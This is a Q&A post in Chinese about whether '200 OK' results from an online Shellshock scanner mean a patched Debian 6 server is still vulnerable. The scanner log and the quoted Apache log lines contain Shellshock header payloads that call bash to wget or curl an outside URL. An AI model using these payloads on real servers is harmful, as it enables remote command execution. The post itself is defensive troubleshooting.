我已经修复了 Debian 6 服务器上的 shellshock 错误,并且在http://shellshock.brandonpotter.com/我得到“未发现漏洞”的信息,这没问题,但是他们还检查了其他内容,在测试日志中我得到了:
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
...
...
...
“200 OK”这样可以吗?200 表示可访问。我检查了其他几个域名,其中一些也显示“200 OK”,但其他显示“Error”。
它会一直这样吗?还是我应该修复它?如果是,我该怎么做?
答案1
我已经在我的网站上检查过了,你不必担心。
此站点对进行了一些测试/,它们不调用特定的 cgi 脚本。无论传递的 referer 或 user-agent 试图利用什么,结果都是 200 OK。
这是我的 apache 日志显示的一个示例:
75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-"
75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"